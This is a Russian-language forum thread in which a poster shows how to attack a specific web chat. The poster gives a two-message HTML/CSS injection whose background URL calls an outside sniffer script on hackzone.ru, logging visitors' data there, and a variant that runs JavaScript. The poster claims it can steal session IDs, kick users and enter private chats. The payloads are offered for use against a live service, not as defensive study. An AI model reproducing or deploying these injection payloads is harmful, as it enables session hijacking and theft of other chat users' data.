Нда... любопытный чатик....
Но ломается он намного круче чем просто глюки с фонтом..
Например его можно сниферить:
В два этапа , сначала посылем такое сообщение:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;a href=&quot;http://dsds.ds/?&quot;a=`&gt;input fdfs&lt;/a&gt;[/QUOTE]<span id='postcolor'>
И сразу же за ним еще одно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(http://www.hackzone.ru/cgi-bin/sniff.cgi?Algol)` [/QUOTE]<span id='postcolor'>
(сообщения нужно посылать именно такие, &quot;лишние&quot; пробелы не удалять &#33

Результат как говорится на лице ....
(вернее в логе хакзоны, а для тех кто в танке: лог хак зоны http://www.hackzone.ru/files/snifflog.txt)

гмм... оригинално!:))
ну если как бэк можно вставить любой? урл, тооо... получается можно и скрипт какой то вставить или нет?
оччень очень интересная идЭя... :)

ты видимо не читал мои статьи, поэтому тебе кажется это оригинальным...
На самом деле это старая технология , приспособленная к особенностям данного чата.
А насчет скриптов - как ты правильно понял если можно вставить снифер, то можно вставить и скрипт, и узнать номера сессий, и кикнуть , и залезть в приват.. В общем по полной программе....
Для вставки скрипта вместо второго сообщения можно послать например :
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(javascript:alert())` [/QUOTE]<span id='postcolor'>

Только советую эксперементирвать в привате , дабы не шокировать публику ...

а можно через скрипт менять размер шрифта? иль картинку вставлять?

ПРИВЕТ ВСЕМ